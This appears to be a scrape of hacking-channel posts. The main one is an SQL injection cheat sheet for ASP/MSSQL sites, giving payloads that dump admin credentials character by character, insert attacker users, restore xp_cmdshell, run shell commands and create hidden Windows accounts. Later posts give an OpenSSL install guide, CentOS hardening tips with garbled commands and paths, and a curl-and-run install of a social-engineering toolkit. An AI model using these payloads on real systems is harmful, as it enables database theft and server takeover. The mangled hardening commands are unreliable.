▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

1) Determine whether there is an injection point
'; and 1=1 and 1=2

2) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists

3) Guess the number of accounts. If you encounter 0<return to the correct page 1<return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)

5) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.

and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)

and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)


🦑Guess the character

6) and 1=(select count(*) from admin where left(name,1)='a')
and 1=(select count(*) from admin where left(name,2)='ab')-
Just add one character at a time and guess like this. If you guess how many digits you just guessed, it's correct, and the account number is calculated.

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query sentence can guess the user and password in Chinese. Just change the number after it to the ASSIC code in Chinese and it is OK. Finally, the result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

7) Look at the server patch = something went wrong and SP4 patch was applied

and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

8) Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)

and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
See if xp_cmdshell is deleted


and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--
xp_cmdshell is deleted, restored, supports absolute path restoration
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

9) Reverse PING own experiment

;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

10) Add account


;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory E:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"'--
Access attributes: (cooperate with writing a webshell)

11) declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Explosive library Special skills: %5c='\' or submit / and \ modify %5
and 0<>(select top 1 paths from newtable)--

12) Get the library name (from 1 to 5 are the system id, 6 or more can be judged)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7, 8, 9.... to get more database names

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) UID18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) admin一user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)
and 0<(select user_id from BBS.dbo.admin where username>1) 可
You can get the password in turn. . . . . Suppose there are fields such as user_id username and password

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access)

13)Get the WEB path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- image—cmd


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install the most recent version of OpenSSL on Windows 10 :

Take OpenSSL for example.

This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to “protect communications over computer networks from eavesdropping,” but guess what?

2) From the very beginning, it was riddled with mistakes.

This can be inevitable, to a certain extent - after all, we're talking about software.

While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.

It's a shame that the official OpenSSL site only offers Linux source.

While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".

If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.

1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.

They exist.

2) To download the required one, follow the link:

https://slproweb.com/products/Win32OpenSSL.html

Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.

3) Scroll down to the Download Win32 OpenSSL section.

Now you need to select the correct file from this list.

4) There are two main types for each version: light and full.

5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.

6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.

Follow the GUI installation instructions.

7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:

C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".

8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)

9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:

10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.

11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 CentOS Server Security Tips :

1) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.

Often, buffer overflow attacks can use such executables to run unauthorized code as root.

# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:

# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:

# chmod gs / path / to / binary_file

2) Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.

Run the below find command to list files or directories without users and groups.

# find / -nouser -o -nogroup -exec ls -l {} \;

3) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.

Run the command below to display writable files other than symbolic links which are always writable to everyone.

# find / -path / proc -prune -o -perm -2! -type l –ls

4) Create strong passwords
Create a password that is at least eight characters long.

Password must contain numbers, special characters and capital letters.

Use pwmake to generate a 128-bit password from / dev / urandom.

# pwmake 128

5) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:

password required pam_pwquality.so retry = 3
By adding this line, you enter a policy where the entered password cannot contain more than 3 characters in a monotonic sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.

To force users to use a password that is at least 8 characters long, including all character classes, sequential character validation, add the following lines to /etc/security/pwquality.conf:

minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian

6) Use password aging
The chage command can be used to control the age of a user's password.

To set the age of a user's password to 45 days, use the following command:

# chage -M 45 username
To disable password expiration use the command:

# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username

7) Blocking accounts
User accounts can be locked out by running passwd or usermod command:

# passwd -l username
# usermod -L username
To unlock accounts, use the -u option for the passwd command and the -U option for usermod.
see also:

🐧 How to safely delete a user account in Linux

How to lock a user account on Centos 7

8) Deny shell access
To prevent the system account (regular account or service account) from accessing the bash shell, change the root shell to / usr / sbin / nologin or / bin / false in the / etc / passwd file by entering the following command:

# usermod -s / bin / false username
To change the shell when creating a new user, enter the following command:

# useradd -s / usr / sbin / nologin username

9) Lock the user's virtual console with vlock
vlock is a program used to lock one session in the Linux console.

Install the program and start blocking your terminal session by running the following commands:

# yum install vlock
# vlock

10) Use a centralized system for account management and authentication
Using a centralized authentication system can greatly simplify account management. Services that can offer this type of account management are IPA Server, LDAP, Kerberos, Microsoft Active Directory, Nis, Samba ADS, or Winbind.

Some of these services are securely protected by default with cryptographic protocols and symmetric key cryptography such as Kerberos.

11) Force mount read-only USB drives
Using the blockdev utility, you can force all removable media to be mounted read-only.

For example, create a new udev configuration file named 80-readonly-usb.rules in the /etc/udev/rules.d/ directory with the following content:

SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:

# udevadm control -reload

12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.

# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login

To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:

PermitRootLogin no

13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.

If you set an ACL for a directory, its child directories will automatically inherit the same rights.

For instance:

# setfacl -mu: user: rw file
# getfacl file


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install the most recent version of OpenSSL on Windows 10 ?

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑no root Social Engineering Toolkit on Termux
#FastTips

1) pkg update && pkg upgrade -y

2) apt install curl -y

3) curl -LO https://raw.githubusercontent.com/Hax4us/setoolkit/master/setoolkit.sh

4) sh setoolkit.sh

5) After finishing the above process type the following command

6) cd setoolkit

7) ./setup.py install

8) ./setoolkit

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁